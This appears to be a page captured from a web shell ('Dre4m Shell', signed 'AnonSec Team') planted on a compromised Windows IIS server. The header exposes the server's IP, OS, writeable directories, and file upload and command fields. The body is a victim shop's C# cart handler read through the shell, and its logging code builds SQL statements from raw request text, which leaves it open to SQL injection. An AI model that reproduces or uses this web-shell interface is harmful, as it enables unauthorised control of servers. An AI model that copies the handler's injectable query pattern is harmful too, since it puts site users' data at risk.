Dre4m Shell
Server IP : 103.6.199.200  /  Your IP : 3.133.129.8
Web Server : Microsoft-IIS/10.0
System : Windows NT EMPUSA 10.0 build 20348 (Windows Server 2016) i586
User : EMPUSA$ ( 0)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/Domains/tradepan/cyreward.biz/wwwroot/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/Domains/tradepan/cyreward.biz/wwwroot/AjAddCart.ashx
<%@ WebHandler Language="C#" Class="AjAddCart" %>
using System;
using System.Collections.Generic;
using System.Linq;
using System.Data;
using System.Data.OleDb;
using System.Configuration;
using System.Collections;
//using System.Data.Objects;
//using System.Data.Entity.Core.Objects;
using System.Data.Entity;
using System.Xml;
using System.Xml.Linq;
using System.Web;
using System.Web.Security;
using System.Web.UI;
using System.Web.UI.WebControls;
using System.Web.UI.WebControls.WebParts;
using System.Web.UI.HtmlControls;

using System.Text;
using System.IO;
using System.Net;
//using HtmlTextFormat;
using System.Diagnostics;
using System.Threading;

using System.Web.Services;
using System.Web.Script.Serialization;



public class AjAddCart : IHttpHandler
{


    //#region Basic Measurement
    //private OleDbConnection Connection;
    //private OleDbDataAdapter Da;
    //private OleDbCommand Command;
    //private OleDbDataReader DataReader;
    //public string RedirectPage;
    //#endregion
    

    public string[] l_temp = new string[20];
    ICEClass icObj = new ICEClass();

    
        public void ProcessRequest(HttpContext context)
        {
            bool l_processed = false ;
            string FilePath= "";
            string ret2 = "";
            
           // FilePath = "C:/Domains/tradepan/eup4u.com/wwwroot/APA/";
            FilePath = icObj.gs_root + "APA/";   //"C:/Domains/haitao/haitao.com.my/wwwroot/APA/";
            context.Response.AppendHeader("Cache-Control", "no-cache, must-revalidate, max-age=0");
            context.Response.AppendHeader("Expires", "Thu, 01 Jan 1970 00:00:01 GMT");
            context.Response.AppendHeader("Pragma", "no-cache");

            //context.Response.ContentType = "text/xml";

            //// IP白名单检测
            //var client_ip = context.Request.UserHostAddress;
            //if (!iplists.ContainsKey(client_ip) || iplists[client_ip] != true)
            //{
            //    context.Response.Write("forbidden");
            //    context.Response.End();
            //}


            string xml_text;
            StreamReader reader;
            using (reader = new StreamReader(context.Request.InputStream))
            {
                xml_text = reader.ReadToEnd();
            }


            string l_IP = "";
            int l_wbw_i = 0;
            string l_wbw = "";

            
            try
            {
                l_IP = context.Request.UserHostAddress;
                //this.Request.ServerVariables["REMOTE_ADDR"];
                
                //xml_text = @"{""command"":""CLV"",""username"":""lenovo"",""country"":""WM"",""lang"":""CN"",""voucher"":10,""rva"":10,""cash"":25,""amount"":0,""qtr"":""0;0;0;0;0;1;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;"",""sponsor_id"":""ADMIN5"",, ""sign"":""aX5HoVUnFdNYDLuE9icuVUqWDfWMXmp4UDlu7UqwpC1a2bQa3d""} ";
                //if (false)
               // {
                    l_wbw_i = xml_text.IndexOf('{');
                    if (l_wbw_i < 0)
                    {
                       // icObj.WriteMyFile("cvv", FilePath, icObj.ICDateTime(0).Substring(0, 11), icObj.ICDateTime(0));
                                                
                        //ret2 = @"[{""id"":""71"",""title"":""Cleveland Classic: Joshna Chinappa, Dipika Pallikal progress"",""category"":""poke"",""date"":""2017-09-28"",""image"":""http:\/\/mobileappdatabase.in\/smartnews\/app_dashboard\/uploads\/181300327_Dipika-Pallikal.jpg"",""description"":""p>\r\n""}]";

                        ret2 = @"{""Token"": ""KsVLir43BPP3qWoYoWd8882f8oQ75KL8UBuZiiE4yVGIXczQt8882fcmFAoq6kd9wwDPJAk1PI0BdRjy8xENAdrhHdaCKDEigdmR1u7iahcPbZfiFJlcOIO8882bGCJH2UuAH8882bnDZg5cuhW4CfZiGvrhkXtRmrdaiFGF2KS7hmz7wab8882bm0o2wXH9Di1RLR8882bDWaub41eMZXz3rlLtzOhyjU0Z7ydFpm3h3cP39sGUja3TF0iIv8dDilaYnals7kBqrh96TJsYBRu5H6hAJtKElVtLZCMhEktcwzFWIoFxz8882b378882fNJRV8MGBRWCdQal78882fsuxW8sufVKbeptjwB8882f8882bstGuLeB1JVDnz6Y8882fRilEGZl67eKi7cXJx2wKy64FskIZrmKc21AvwNqZZ16w0sHtSWYH2SxWp8882beSj5tcQVx3Aun9gBIl8882f8882foltX0tgc8883d"", ""RVA"": ""115"", ""CC"": ""MYR"", ""Cart"": [  { ""EUP"": 1, ""Qty"": 1, ""Price"": 45, ""Cur"":""MYR"", ""Img"":""82"", ""Imgfile"":""821"", ""Desc"":""NH-02 MACA OLIGO Fruit Juice (13sachets X7g)"" } , { ""EUP"": 7, ""Qty"": 1, ""Price"": 45, ""Cur"":""MYR"", ""Img"":""84"", ""Imgfile"":""841"", ""Desc"":""NH-08 Alfalfa chlorophyll + Honey (24 sacs x 5g)"" } , { ""EUP"": 22, ""Qty"": 1, ""Price"": 25, ""Cur"":""MYR"", ""Img"":""26"", ""Imgfile"":""261"", ""Desc"":""SG-10 Natural Make Up Remover Cream (90ml)"" }  ] }";

                        
                        context.Response.Write(ret2);
                        return;
                    }
                    l_wbw = xml_text.Substring(l_wbw_i);

               // }
                     
            // 请求日志
                //using (var db = new bet2Entities())
                //{
                //    var log = new bet_openapi_log();
                //    log.req_urlreferrer = context.Request.UrlReferrer.ToString();
                //    log.req_useragent = context.Request.UserAgent;
                //    log.req_hostaddress = context.Request.UserHostAddress;
                //    log.req_hostname = context.Request.UserHostName;
                //    log.req_date = DateTime.UtcNow;
                //    log.req_content = xml_text;

                //    db.AddTobet_openapi_log(log);
                //    db.SaveChanges();
                //}

            }
            catch (Exception ex)
            {
                return;
            }


            string[] l_Request = new string[50];
            f_requestlog(FilePath , xml_text);
            f_requestdata(l_wbw, ref l_Request);      
  
            // string ret = ResponseFund2(l_Token, l_User, l_Pass, l_Amt);
            //response_sb.AppendLine(ret);
            //context.Response.Write(response_sb.ToString());
            //ret2 = @"[{""id"":""71"",""title"":""Cleveland Classic: Joshna Chinappa, Dipika Pallikal progress"",""category"":""poke"",""date"":""2017-09-28"",""image"":""http:\/\/mobileappdatabase.in\/smartnews\/app_dashboard\/uploads\/181300327_Dipika-Pallikal.jpg"",""description"":""p>\r\n""}]";

            if (l_Request[42] != null && l_Request[43] == "1")
            {
                ret2 = AddCCart(l_Request[42], l_Request[41], l_Request[43]);
               // ret2 = ret2.Substring(1);  
            }
            
            icObj.WriteMyFile("cvv", FilePath, icObj.ICDateTime(0).Substring(0, 11), ret2);
            context.Response.Write(ret2);                        
        }

    public bool IsReusable
    {
        get
        {
            return false;
        }
    }

    [WebMethod]
    public static string AddCCart(string id, string _token, string quantity)
    {
        string l_Json = "";
      //  l_Json = @"{""Token"": ""KsVLir43BPP3qWoYoWd8882f8oQ75KL8UBuZiiE4yVGIXczQt8882fcmFAoq6kd9wwDPJAk1PI0BdRjy8xENAdrhHdaCKDEigdmR1u7iahcPbZfiFJlcOIO8882bGCJH2UuAH8882bnDZg5cuhW4CfZiGvrhkXtRmrdaiFGF2KS7hmz7wab8882bm0o2wXH9Di1RLR8882bDWaub41eMZXz3rlLtzOhyjU0Z7ydFpm3h3cP39sGUja3TF0iIv8dDilaYnals7kBqrh96TJsYBRu5H6hAJtKElVtLZCMhEktcwzFWIoFxz8882b378882fNJRV8MGBRWCdQal78882fsuxW8sufVKbeptjwB8882f8882bstGuLeB1JVDnz6Y8882fRilEGZl67eKi7cXJx2wKy64FskIZrmKc21AvwNqZZ16w0sHtSWYH2SxWp8882beSj5tcQVx3Aun9gBIl8882f8882foltX0tgc8883d"", ""RVA"": ""115"", ""CC"": ""MYR"", ""Cart"": [  { ""EUP"": 1, ""Qty"": 1, ""Price"": 45, ""Cur"":""MYR"", ""Img"":""82"", ""Imgfile"":""821"", ""Desc"":""NH-02 MACA OLIGO Fruit Juice (13sachets X7g)"" } , { ""EUP"": 7, ""Qty"": 1, ""Price"": 45, ""Cur"":""MYR"", ""Img"":""84"", ""Imgfile"":""841"", ""Desc"":""NH-08 Alfalfa chlorophyll + Honey (24 sacs x 5g)"" } , { ""EUP"": 22, ""Qty"": 1, ""Price"": 25, ""Cur"":""MYR"", ""Img"":""26"", ""Imgfile"":""261"", ""Desc"":""SG-10 Natural Make Up Remover Cream (90ml)"" }  ] }";
      //  context.Response.Write(l_Json );  
      //  return l_Json;

        // f_Goo(); 
        ICEClass lcObj = new ICEClass();
        //return "{result:" + lcObj.f_SaveItemInformation("EN", "HAIT", "wbw_CLV", "0", "55" + id + "dzxxx45453334", "", "", "") + ", status:4, message:5}";
        double gd_Total = 0;
        double gd_Cash = 0;
        double gd_RVA = 0;
        double gd_KG = 0;
        int gl_Count = 0;

        string ls_Country = "WM";
        string ls_Qty = "1";
        string ls_ItemID = id;
        string l_StrQtr = lcObj.xxa_DecryptURL2(_token, "");

        string l_Lang = "EN";
        string l_MYR = "MYR";
        l_StrQtr = lcObj.f_AddItem(l_Lang, ls_ItemID, ls_Qty, l_StrQtr, ls_Country, ref gd_Total, ref gd_Cash, ref gd_RVA, ref gd_KG, ref gl_Count, ref l_Json);

        l_Json = @"{ ""Token"": """ + lcObj.xxa_EncryptURL2(l_StrQtr, "") + @""", ""RVA"": """ + lcObj.VarStr(gd_RVA.ToString() , 2) + @""", ""CC"": """ + l_MYR + @""", ""Cart"": [ " + l_Json.Substring(1) + @" ] }";

        //l_Json = "{ \"Token\": \"KsVLir43BPP3qWoYoWd8882f8oQ75KL8UBuZiiE4yVGIXczQt8882fcmFAoq6kd9wwDPJAk1PI0BdRjy8xENAdrhHdaCKDEigdmR1u7iahcPbZfiFJlcOIO8882bGCJH2UuAH8882bnDZg5cuhW4CfZiGvrhkXtRmrdaiFGF2KS7hmz7wab8882bm0o2wXH9Di1RLR8882bDWaub41eMZXz3rlLtzOhyjU0Z7ydFpm3h3cP39sGUja3TF0iIv8dDilaYnals7kBqrh96TJsYBRu5H6hAJtKElVtLZCMhEktcwzFWIoFxz8882b378882fNJRV8MGBRWCdQal78882fsuxW8sufVKbeptjwB8882f8882bstGuLeB1JVDnz6Y8882fRilEGZl67eKi7cXJx2wKy64FskIZrmKc21AvwNqZZ16w0sHtSWYH2SxWp8882beSj5tcQVx3Aun9gBIl8882f8882foltX0tgc8883d\", \"RVA\": \"115\", \"CC\": \"MYR\", \"Cart\": [  { \"EUP\": 1, \"Qty\": 1, \"Price\": 45, \"Cur\":\"MYR\", \"Img\":\"82\", \"Imgfile\":\"821\", \"Desc\":\"NH-02 MACA OLIGO Fruit Juice (13sachets X7g)\" } , { \"EUP\": 7, \"Qty\": 1, \"Price\": 45, \"Cur\":\"MYR\", \"Img\":\"84\", \"Imgfile\":\"841\", \"Desc\":\"NH-08 Alfalfa chlorophyll + Honey (24 sacs x 5g)\" } , { \"EUP\": 22, \"Qty\": 1, \"Price\": 25, \"Cur\":\"MYR\", \"Img\":\"26\", \"Imgfile\":\"261\", \"Desc\":\"SG-10 Natural Make Up Remover Cream (90ml)\" }  ] }";
        // l_Json = @"{""Token"": ""KsVLir43BPP3qWoYoWd8882f8oQ75KL8UBuZiiE4yVGIXczQt8882fcmFAoq6kd9wwDPJAk1PI0BdRjy8xENAdrhHdaCKDEigdmR1u7iahcPbZfiFJlcOIO8882bGCJH2UuAH8882bnDZg5cuhW4CfZiGvrhkXtRmrdaiFGF2KS7hmz7wab8882bm0o2wXH9Di1RLR8882bDWaub41eMZXz3rlLtzOhyjU0Z7ydFpm3h3cP39sGUja3TF0iIv8dDilaYnals7kBqrh96TJsYBRu5H6hAJtKElVtLZCMhEktcwzFWIoFxz8882b378882fNJRV8MGBRWCdQal78882fsuxW8sufVKbeptjwB8882f8882bstGuLeB1JVDnz6Y8882fRilEGZl67eKi7cXJx2wKy64FskIZrmKc21AvwNqZZ16w0sHtSWYH2SxWp8882beSj5tcQVx3Aun9gBIl8882f8882foltX0tgc8883d"", ""RVA"": ""115"", ""CC"": ""MYR"", ""Cart"": [  { ""EUP"": 1, ""Qty"": 1, ""Price"": 45, ""Cur"":""MYR"", ""Img"":""82"", ""Imgfile"":""821"", ""Desc"":""NH-02 MACA OLIGO Fruit Juice (13sachets X7g)"" } , { ""EUP"": 7, ""Qty"": 1, ""Price"": 45, ""Cur"":""MYR"", ""Img"":""84"", ""Imgfile"":""841"", ""Desc"":""NH-08 Alfalfa chlorophyll + Honey (24 sacs x 5g)"" } , { ""EUP"": 22, ""Qty"": 1, ""Price"": 25, ""Cur"":""MYR"", ""Img"":""26"", ""Imgfile"":""261"", ""Desc"":""SG-10 Natural Make Up Remover Cream (90ml)"" }  ] }";

        return l_Json;
    }
    
    public string f_requestlog(string FilePath, string xml_text)
    {

        string a_Trdid = "";
        string a_Trhid = "";
        string a_Trsid = "";

        try
        {
            //FilePath = "C:/Domains/tradepan/eup4u.com/wwwroot/APA/";// "~APA/";
            icObj.WriteMyFile("cvv", FilePath, icObj.ICDateTime(0).Substring(0, 11), xml_text);
        }
        catch
        {
        }
        
        string l_ll = icObj.fs_Last("wbw_eLog", "TransID", ref a_Trdid, ref a_Trhid, ref a_Trsid);

        if (xml_text.Length > 250)
        {
            if (xml_text.Length < 500)
                icObj.ExecSQL(0, "insert into wbw_eLog(transid, trdid, trhid, trsid, trdate, Amount, RefNo, Subject1, Subject2 ) values (" + l_ll + " + 1, " + a_Trdid + ", " + a_Trhid + ", " + a_Trdid + ", #" + icObj.ICDateTime(0) + "# , 0,  'SET' , '" + xml_text.Substring(0, 250) + "', '" + xml_text.Substring(250) + "' ) ");
            else
                icObj.ExecSQL(0, "insert into wbw_eLog(transid, trdid, trhid, trsid, trdate, Amount, RefNo, Subject1, Subject2 ) values (" + l_ll + " + 1, " + a_Trdid + ", " + a_Trhid + ", " + a_Trdid + ", #" + icObj.ICDateTime(0) + "# , 0,  'SET' , '" + xml_text.Substring(0, 250) + "', '" + xml_text.Substring(250, 250) + "' ) ");
        }
        else
            icObj.ExecSQL(0, "insert into wbw_eLog(transid, trdid, trhid, trsid, trdate, Amount, RefNo, Subject1 ) values (" + l_ll + " + 1, " + a_Trdid + ", " + a_Trhid + ", " + a_Trdid + ", #" + icObj.ICDateTime(0) + "# , 0,  'SET' , '" + xml_text + "' ) ");

        return l_ll;        
    }
    
    public string f_requestdata(string l_wbw, ref string[] l_Request)
    {

        string[] l_json = l_wbw.Split(',');
        int ll_i = 0;
        string l_Field = "";
        string l_Data = "";
        string l_Source = "";
        
               
        for (ll_i = 0; ll_i < l_json.GetUpperBound(0) + 1; ll_i++)
        {
            l_Source = l_json[ll_i] + "::";
            l_Field = l_Source.Split(':')[0];
            l_Data = l_Source.Split(':')[1];

            l_Field = l_Field.Replace("\"", " ").Replace("{", " ").Trim();
            l_Data = l_Data.Replace("\"", " ").Replace("}", " ").Trim();
            l_Field = l_Field.Replace("'", " ").Trim();
            l_Data = l_Data.Replace("'", " ").Trim();

            if (l_Field == "command") l_Request[1] = l_Data;
            if (l_Field == "sign") l_Request[2] = l_Data;
            if (l_Field == "transaction_id") l_Request[3] = l_Data;
            if (l_Field == "username") l_Request[4] = l_Data;
            if (l_Field == "password") l_Request[5] = l_Data;
            if (l_Field == "token") l_Request[6] = l_Data;
            if (l_Field == "amount") l_Request[7] = l_Data;
            if (l_Field == "out_trade_no") l_Request[8] = l_Data;
            if (l_Field == "version") l_Request[9] = l_Data;
            if (l_Field == "mt4") l_Request[10] = l_Data;
            if (l_Field == "currency_id") l_Request[11] = l_Data;
            if (l_Field == "tr_code") l_Request[12] = l_Data;
            if (l_Field == "remark") l_Request[13] = l_Data;
            if (l_Field == "balance") l_Request[14] = l_Data;
            if (l_Field == "member_name") l_Request[15] = l_Data;
            if (l_Field == "sponsor_id") l_Request[16] = l_Data;
            if (l_Field == "ic_number") l_Request[17] = l_Data;
            if (l_Field == "gender") l_Request[18] = l_Data;
            if (l_Field == "email") l_Request[19] = l_Data;
            if (l_Field == "phone") l_Request[20] = l_Data;
            if (l_Field == "country") l_Request[21] = l_Data;
            if (l_Field == "address") l_Request[22] = l_Data;
            if (l_Field == "ac1") l_Request[23] = l_Data;
            if (l_Field == "ab1") l_Request[24] = l_Data;
            if (l_Field == "ac2") l_Request[25] = l_Data;
            if (l_Field == "ab2") l_Request[26] = l_Data;
            if (l_Field == "date_from") l_Request[27] = l_Data;
            if (l_Field == "date_to") l_Request[28] = l_Data;
            if (l_Field == "username") l_Request[29] = l_Data;
            if (l_Field == "sign") l_Request[30] = l_Data;
            if (l_Field == "bankcard") l_Request[31] = l_Data;
            if (l_Field == "amount") l_Request[32] = l_Data;
            if (l_Field == "lang") l_Request[33] = l_Data;
            if (l_Field == "voucher") l_Request[34] = l_Data;
            if (l_Field == "rva") l_Request[35] = l_Data;
            if (l_Field == "cash") l_Request[36] = l_Data;
            if (l_Field == "qtr") l_Request[37] = l_Data;
            if (l_Field == "shipping") l_Request[38] = l_Data;
            if (l_Field == "postcode") l_Request[39] = l_Data;
            if (l_Field == "city") l_Request[40] = l_Data;
            if (l_Field == "_token") l_Request[41] = l_Data;
            if (l_Field == "id") l_Request[42] = l_Data;
            if (l_Field == "quantity") l_Request[43] = l_Data;
        }   
        
        return "1";
    }
    
    

}

Anon7 - 2022
AnonSec Team